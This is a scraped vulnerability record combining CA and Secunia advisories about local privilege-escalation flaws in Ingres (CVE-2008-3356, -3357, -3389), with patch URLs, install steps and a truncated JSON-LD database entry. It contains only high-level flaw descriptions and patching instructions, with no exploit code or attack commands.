Linux AMD [3.0.3 (a64.lnx/211)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12835-a64-lnx.tar.z
Linux Intel 32bit [3.0.3 (int.lnx/103)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.103.12836-int-lnx.tar.z
Linux Itanium [3.0.3 (i64.lnx/211)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12838-i64-lnx.tar.z
Solaris SPARC [3.0.3 (su9.us5/211)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12834-su9-us5.tar.z
Solaris x64/x86 [3.0.3 (a64.sol/211)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12832-a64-sol.tar.z
Ingres r3 Vulnerability Updates Install Steps (August 1, 2008)
Unix/Linux: 1. Log on to your system using the installation owner account and make sure the environment is set up correctly: 1. II_SYSTEM must be set to the Ingres system files 2. PATH must include $II_SYSTEM/bin and $II_SYSTEM/utility directories. 2. Change directory to the root directory of the Ingres installation or use a previously created directory. cd $II_SYSTEM/ingres or cd 3. Copy the download maintenance update file in to the current directory and uncompress 4. Read in the update file with the following commands: umask 022 tar xf [update_file] This will create the directory: $II_SYSTEM/ingres/patchXXXXX or /patchXXXXX Note: ‘XXXXX' in patchXXXXX refers to the update number 5. Stop all Ingres processes with the ‘ingstop' utility: ingstop 6. Change directory to the patch directory: cd patchXXXXX 7. Within the patch directory run the following command: ./utility/iiinstaller Please check the $II_SYSTEM/ingres/files/patch.log file to make sure the patch was applied successfully. Also check the $II_SYSTEM/ingres/version.rel to make sure the patch is referenced. Note: The patch can also be installed silently using the ‘-m' flag with iiinstaller: ./utility/iiinstaller -m 8. Once the patch install has been complete, re-link the iimerge binary with the following command: iilink 9. Ingres can then be restarted with the ‘ingstart' utility: ingstart
For these products: Advantage Data Transformer r2.2 Allfusion Harvest Change Manager r7.1 ARCserve for Linux r11.5 GA/SP1 CleverPath Aion BPM r10.1 CleverPath Aion BPM r10.2
Apply the build below that is listed for your platform (note that URLs may wrap):
AIX ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3.211.12833-r64-us5.tar
HP-UX Itanium ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3.211.12831-i64-hpu.tar
HP-UX RISC ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3.211.12830-hp2-us5.tar
Linux AMD EI build ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-211-EI-linux-x86_64.tar.gz
Linux AMD II build ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-211-linux-x86_64.tgz
Linux Intel EI build ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-103-EI-linux-i386.tgz
Linux Intel II build ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-103-pc-linux-i386.tgz
Linux Itanium EI build ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-211-EI-linux-ia64.tar.gz
Linux Itanium II build ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-211-linux-ia64.tgz
Solaris SPARC ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3.211.12834-su9-us5.tar
Solaris x64/x86 ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3.211.12832-a64-sol.tar
Ingres r3 Build Install Steps (August 1, 2008)
Important: Prior to installing the build, a full operating system backup of the $II_SYSTEM/ingres directory on Unix/Linux and %II_SYSTEM%\ingres directory on Windows must be taken with Ingres completely shut down. Also, a backup of any other DATA locations that you may have must be taken, again with Ingres shut down. In case there is a problem with the update install, this allows Ingres to be restored from the backup.
Unix: 1. Log in to the system as the installation owner and make sure the environment is set up correctly: 1. II_SYSTEM must be set to the Ingres home directory 2. PATH must include $II_SYSTEM/ingres/bin and $II_SYSTEM/ingres/utility directories 3. Add $II_SYSTEM/ingres/lib to the shared library path 4. Set TERM to ‘vt100' and TERM_INGRES to ‘vt100fx' 2. Copy the downloaded update file to the /tmp directory and uncompress 3. Read in the update file with the following commands: umask 022 tar xf [update_file] This creates a directory containing the distribution and other files. 4. Stop all applications that may be connected to or using any of the files in the Ingres instance. 5. Stop all Ingres processes with the ‘ingstop' utility: ingstop 6. Important: Take an operating system backup of the $II_SYSTEM/ingres directory and other DATA locations that you may have elsewhere. Also, copy the $II_SYSTEM/ingres/files/config.dat and $II_SYSTEM/ingres/files/symbol.tbl files to a safe location to ensure that the configuration can be restored. 7. From the root directory of the Ingres installation ($II_SYSTEM/ingres), run the following command: tar xf /tmp//ingres.tar install 8. Run the following command: install/ingbuild 9. The initial install screen appears. 10. In the Distribution medium enter the full path to the ‘ingres.tar' file (including the file) (See step 4). 11. Choose PackageInstall from the list of installation options and then choose ‘Stand alone DBMS Server' from the list of packages. Then choose ExpressInstall. 12. Choose Yes in the pop-up screen and press Enter key. The install utility verifies that each component was transferred properly from the distribution medium. When this is finished (without errors), another pop-up screen for setting up the components comes up. 13. Select Yes and press Enter key to go to the Setup program. 14. Once the installation is complete, check the $II_SYSTEM/ingres/files/install.log for any errors. Also, check the $II_SYSTEM/ingres/version.rel file to verify the new build is referenced; this should show 3.0.3 for the build. 15. If there are no errors, then restore the $II_SYSTEM/ingres/files/config.dat and $II_SYSTEM/ingres/files/symbol.tbl files from the copies made in step 6 to replace the existing files. 16. Start Ingres using the ‘ingstart' utility: ingstart 17. Upgrade the databases in the installation to the new release level: upgradedb -all
Linux: 1. Log on to the machine as ‘root'. 2. Copy the downloaded build update file and to a previously chosen directory and uncompress. 3. Read in the update file with the following command: tar xf [update file] This creates a directory containing rpm packages for all of the Ingres tools. 4. Shut down any non-Ingres application(s) that may be connected to or using any of the files in the specified Ingres instance. 5. Stop all Ingres processes with the ‘ingstop' utility: ingstop 6. Important: Take an operating system backup of the $II_SYSTEM/ingres directory and other DATA locations that you may have elsewhere. 7. From the directory that was created in step 3, install the update rpms with the following command: rpm –Uvh *.rpm If the following error is seen for either the ‘ca-ingres-documentation-3.0.3-103', the ‘ca-ingres-CATOSL-3.0.3-103' or the ‘ca-cs-utils-11.0.04348-0000' (or all of them) packages, remove them from the directory containing the rpms and re-run the above command: package is already installed 8. If the installation finishes successfully, then log on as ‘ingres' to the machine and start Ingres using the ‘ingstart' utility: ingstart 9. Upgrade ‘mdb' database with the following command: upgradedb -all
For these products: CA ARCserve Backup for Unix r11.1 CA ARCserve Backup for Unix r11.5 GA/SP1/SP2 CA ARCserve Backup for Unix r11.5 SP3 CA ARCserve Backup for Linux r11.1 EEM 8.1 eTrust Audit/SCC 8.0 sp2 NSM 3.0 0305 NSM 3.1 0403 NSM r3.1 SP1 0703 Unicenter Service Catalog r2.2 Unicenter ServicePlus Service Desk 6.0
Apply the update below that is listed for your platform (note that URLs may wrap):
AIX 32bit [2.6/xxxx (rs4.us5/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12718.tar.Z
AIX 64bit [2.6/xxxx (r64.us5/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12798.tar.Z
HP-UX with ARCserve 11.1 or 11.5/GA/SP1/SP2/SP3 https://support.ca.com/irj/portal/anonymous/solndtls?aparNo=RO01277&os=HP&actionID=3
HP-UX Itanium [2.6/xxxx (i64.hpu/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12748.tar.Z
HP-UX RISC 32bit [2.6/xxxx (hpb.us5/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12742.tar.Z
HP-UX RISC 32bit [2.6/xxxx (hpb.us5/00)DBL] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12888.tar.Z
HP-UX RISC 64bit [2.6/xxxx (hp2.us5/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12749.tar.Z
HP Tru64 UNIX [2.6/xxxx (axp.osf/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12676.tar.Z
Linux AMD64 [2.6/xxxx (a64.lnx/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12809.tar.Z
Linux Intel 32bit [2.6/xxxx (int.lnx/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12645.tar.Z
Linux Intel 32bit [2.6/xxxx (int.lnx/00)DBL] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12647.tar.Z
Linux Intel 32bit [2.6/xxxx (int.lnx/00)LFS] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12646.tar.Z
Linux Itanium [2.6/xxxx (i64.lnx/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12648.tar.Z
Linux S/390 [2.6/xxxx (ibm.lnx/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12877.tar.Z
Solaris SPARC 32bit [2.6/xxxx (su4.us5/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12713.tar.Z
Solaris SPARC 32bit double [2.6/xxxx (su4.us5/00)DBL] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12879.tar.Z
Solaris SPARC 64bit [2.6/xxxx (su9.us5/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12751.tar.Z
Ingres 2.6 Vulnerability Updates Install Steps (August 1, 2008)
Unix/Linux: 1. Log on to your system using the installation owner account and make sure the environment is set up correctly: 1. II_SYSTEM must be set to the Ingres system files 2. PATH must include $II_SYSTEM/bin and $II_SYSTEM/utility directories. 2. Change directory to the root directory of the Ingres installation or use a previously created directory. cd $II_SYSTEM/ingres or cd 3. Copy the download maintenance update file in to the current directory and uncompress 4. Read in the update file with the following commands: umask 022 tar xf [update_file] This will create the directory: $II_SYSTEM/ingres/patchXXXXX or /patchXXXXX Note: ‘XXXXX' in patchXXXXX refers to the update number 5. Stop all Ingres processes with the ‘ingstop' utility: ingstop 6. Change directory to the patch directory: cd patchXXXXX 7. Within the patch directory run the following command: ./utility/iiinstaller Please check the $II_SYSTEM/ingres/files/patch.log file to make sure the patch was applied successfully. Also check the $II_SYSTEM/ingres/version.rel to make sure the patch is referenced. Note: The patch can also be installed silently using the ‘-m' flag with iiinstaller: ./utility/iiinstaller -m 8. Once the patch install has been complete, re-link the iimerge binary with the following command: iilink 9. Ingres can then be restarted with the ‘ingstart' utility: ingstart
How to determine if you are affected:
For these products: Admin r8.1 SP2 ARCserve for Linux r11.5 SP2/SP3 CA Directory r8.1 CA Job Management Option R11.0 CA Single Sign-On r8.1 EEM 8.2 EEM 8.2.1 Identity Manager r12 NSM r11 Unicenter Asset Management r11.1 Unicenter Asset Management r11.2 Unicenter Remote Control r11.2 Unicenter Service Catalog r11.1 Unicenter Service Metric Analysis r11.1 Unicenter ServicePlus Service Desk r11 Unicenter ServicePlus Service Desk r11.1 Unicenter ServicePlus Service Desk r11.2 Unicenter Software Delivery r11.1 Unicenter Software Delivery r11.2 Unicenter Workload Control Center r11
The Ingres release information is maintained in %II_SYSTEM%\ingres\version.rel: UNIX or Linux: cat version.rel
The release identifier will be as follows: Operating System Release identifier HP Sparc 32/64bit II 3.0.3 (hp2.us5/211) HP Itanium II 3.0.3 (i64.hpu/211) Intel Solaris 32/64bit II 3.0.3 (a64.sol/211) AIX 32/64bit II 3.0.3 (r64.us5/211) Solaris 32/64bit II 3.0.3 (su9.us5/211) AMD Linux II 3.0.3 (a64.lnx/211) Intel Linux II 3.0.3 (int.lnx/103) Itanium Linux II 3.0.3 (i64.lnx/211)
Notes: 1. You would need to install the Ingres build instead of the patch if either of the following is true: 1. If the Ingres release for your platform is not 3.0.3 in the release identifier or 2. The Ingres release is 3.0.3 but the build level is not 103 for Linux and 211 for all the Unix platforms. If either of the above is true then download and apply the latest build for your operating system(s). 2. If the OS platform you are running Ingres on is not listed, please contact Technical Support.
For these products: Advantage Data Transformer r2.2 Allfusion Harvest Change Manager r7.1 ARCserve for Linux r11.5 GA/SP1 CleverPath Aion BPM r10.1 CleverPath Aion BPM r10.2
The maintenance updates are provided for the latest r3 builds supported by CA which are 3.0.3/103 (Linux) and 3.03/211 (UNIX platforms). If the build embedded is earlier than 3.0.3, it has to be upgraded to 3.0.3 to fix the vulnerabilities.
The Ingres release information is maintained in %II_SYSTEM%\ingres\version.rel: UNIX or Linux: cat version.rel
The release identifier will be as follows: Operating System Release identifier HP Sparc 32/64bit II 3.0.3 (hp2.us5/211) HP Itanium II 3.0.3 (i64.hpu/211) Intel Solaris 32/64bit II 3.0.3 (a64.sol/211) AIX 32/64bit II 3.0.3 (r64.us5/211) Solaris 32/64bit II 3.0.3 (su9.us5/211) AMD Linux II 3.0.3 (a64.lnx/211) Intel Linux II 3.0.3 (int.lnx/103) Itanium Linux II 3.0.3 (i64.lnx/211)
Important: For Linux (AMD, Intel and Itanium) platforms, after applying the build provided on this page, please download and apply the maintenance update. For the other platforms, the builds are patched to the latest maintenance update. Note: 1. If the release you are using is already 3.0.3 build 103 on Linux and 3.0.3 build 211 on Unix, then download and install the maintenance update. 2. If the OS platform you are running Ingres on is not listed, please contact Technical Support.
For these products: CA ARCserve Backup for Unix r11.1 CA ARCserve Backup for Unix r11.5 GA/SP1/SP2 CA ARCserve Backup for Unix r11.5 SP3 CA ARCserve Backup for Linux r11.1 EEM 8.1 eTrust Audit/SCC 8.0 sp2 NSM 3.0 0305 NSM 3.1 0403 NSM r3.1 SP1 0703 Unicenter Service Catalog r2.2 Unicenter ServicePlus Service Desk 6.0
The Ingres release information is maintained in %II_SYSTEM%\ingres\version.rel: UNIX or Linux: cat version.rel
The release identifier will be as follows: Operating System Release identifier AIX 32bit II 2.6/xxxx (rs4.us5/00) AIX 64bit II 2.6/xxxx (r64.us5/00) HP-UX Itanium II 2.6/xxxx (i64.hpu/00) HP-UX RISC 32bit II 2.6/xxxx (hpb.us5/00) HP-UX RISC 32bit II 2.6/xxxx (hpb.us5/00)DBL HP-UX RISC 64bit II 2.6/xxxx (hp2.us5/00) HP Tru64 UNIX II 2.6/xxxx (axp.osf/00) Linux AMD64 II 2.6/xxxx (a64.lnx/00) Linux Intel 32bit II 2.6/xxxx (int.lnx/00) Linux Intel 32bit II 2.6/xxxx (int.lnx/00)DBL Linux Intel 32bit II 2.6/xxxx (int.lnx/00)LFS Linux Itanium II 2.6/xxxx (i64.lnx/00) Linux S/390 II 2.6/xxxx (ibm.lnx/00) Solaris SPARC 32bit II 2.6/xxxx (su4.us5/00) Solaris SPARC 32bit double II 2.6/xxxx (su4.us5/00)DBL Solaris SPARC 64bit II 2.6/xxxx (su9.us5/00)
Note: 1. If the Ingres release embedded in your product is not 2.6, please get the appropriate update here. 2. If the OS platform you are running Ingres on is not listed, please contact Technical Support. 3. For HP-UX platform with CA ARCserve Backup 11.1 or 11.5/GA/SP1/SP2/SP3, download the published ARCserve fix, RO01277: https://support.ca.com/irj/portal/anonymous/solndtls?aparNo=RO01277&os=HP&actionID=3 and follow the enclosed instructions to install the security patch.
Workaround: None
References (URLs may wrap): CA Support: http://support.ca.com/ Security Notice for CA Products That Embed Ingres https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=181989 Solution Document Reference APARs: RO01277 (ARCserve only) CA Security Response Blog posting: CA Products That Embed Ingres Multiple Vulnerabilities community.ca.com/blogs/casecurityresponseblog/archive/2008/08/06.aspx Reported By: iDefense Labs Ingres Database for Linux verifydb Insecure File Permissions Modification Vulnerability http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=731 Ingres Database for Linux libbecompat Stack Based Buffer Overflow Vulnerability http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=732 Ingres Database for Linux ingvalidpw Untrusted Library Path Vulnerability http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=733 Ingres Security Vulnerability Announcement as of August 01, 2008 http://www.ingres.com/support/security-alert-080108.php CVE References: CVE-2008-3356 - Ingres verifydb file create permission override. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3356 CVE-2008-3357 - Ingres un-secure directory privileges with utility ingvalidpw. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3357 CVE-2008-3389 - Ingres verifydb, iimerge, csreport buffer overflow. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3389 OSVDB References: Pending http://osvdb.org/
Changelog for this advisory: v1.0 - Initial Release
Customers who require additional information should contact CA Technical Support at http://support.ca.com.
For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com.
If you discover a vulnerability in CA products, please report your findings to our product security response team. https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782
Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability Research
CA, 1 CA Plaza, Islandia, NY 11749
Contact http://www.ca.com/us/contact/ Legal Notice http://www.ca.com/us/legal/ Privacy Policy http://www.ca.com/us/privacy/ Copyright (c) 2008 CA. All rights reserved. ----------------------------------------------------------------------
Want a new job?
http://secunia.com/secunia_security_specialist/ http://secunia.com/hardcore_disassembler_and_reverse_engineer/
International Partner Manager - Project Sales in the IT-Security Industry: http://corporate.secunia.com/about_secunia/64/
TITLE: Ingres Multiple Vulnerabilities
SECUNIA ADVISORY ID: SA31357
VERIFY ADVISORY: http://secunia.com/advisories/31357/
CRITICAL: Less critical
IMPACT: Privilege escalation
WHERE: Local system
SOFTWARE: Ingres 2.x http://secunia.com/product/14576/ Ingres 2006 (9.x) http://secunia.com/product/14574/
DESCRIPTION: Some vulnerabilities have been reported in Ingres, which can be exploited by malicious, local users to gain escalated privileges.
1) An error exists in the "verifydb" utility due to improperly changing permissions on files and having the setuid-bit set (owned by the "ingres" user). via a specially crafted environmental variable.
3) An error exists within the "ingvalidpw" utility due to being setuid "root" and loading shared libraries from a directory owned by the "ingres" user.
SOLUTION: The vendor has issued fixes. Please see the knowledge base document (customer login required). http://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:416012+HTMPL=kt_document_view.htmpl
PROVIDED AND/OR DISCOVERED BY: An anonymous researcher, reported via iDefense.
ORIGINAL ADVISORY: Ingres: http://www.ingres.com/support/security-alert-080108.php
iDefense: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=731 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=732 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=733
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200808-0315",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ingres",
"scope": "eq",
"trust": 1.8,
"vendor": "ingres",
"version": "2.6"
},
{
"model": "ingres",
"scope": "eq",
"trust": 1.0,
"vendor": "ingres",
"version": "2006"
},
{
"model": "ingres",
"scope": "eq",
"trust": 0.8,
"vendor": "ingres",
"version": "2006 release 1"
},
{
"model": "ingres",
"scope": "eq",
"trust": 0.8,
"vendor": "ingres",
"version": "and 2006 release 2"
},
{
"model": "hp-ux",
"scope": null,
"trust": 0.6,
"vendor": "hp",
"version": null
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "20069.1"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "20069.0.4"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "20060"
},
{
"model": "associates unicenter software delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.2"
},
{
"model": "associates unicenter software delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.2"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter service metric analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter service catalog",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
},
{
"model": "associates unicenter service catalog",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.2"
},
{
"model": "associates unicenter asset management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.2"
},
{
"model": "associates unicenter asset management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates single sign-on",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates nsm",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "0"
},
{
"model": "associates job management option",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates identity manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "12"
},
{
"model": "associates etrust audit/scc sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates eem",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.2.1"
},
{
"model": "associates eem",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.2"
},
{
"model": "associates eem",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates directory",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates cleverpath aion bpm",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.2"
},
{
"model": "associates cleverpath aion bpm",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.1"
},
{
"model": "associates ca arcserve backup for unix ga",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates arcserve backup for unix sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for unix sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for unix ga",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for unix sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates arcserve backup for unix sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates arcserve backup for unix sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates arcserve backup for linux sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for linux sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for linux sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for linux ga",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for linux sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates arcserve backup for linux sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates arcserve backup for linux sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates arcserve backup for linux ga",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates advantage data transformer",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
},
{
"model": "associates admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
}
],
"sources": [
{
"db": "BID",
"id": "30512"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004693"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-050"
},
{
"db": "NVD",
"id": "CVE-2008-3389"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:ingres:ingres",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-004693"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "iDEFENSE",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200808-050"
}
],
"trust": 0.6
},
"cve": "CVE-2008-3389",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CVE-2008-3389",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2008-3389",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2008-3389",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-200808-050",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-004693"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-050"
},
{
"db": "NVD",
"id": "CVE-2008-3389"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
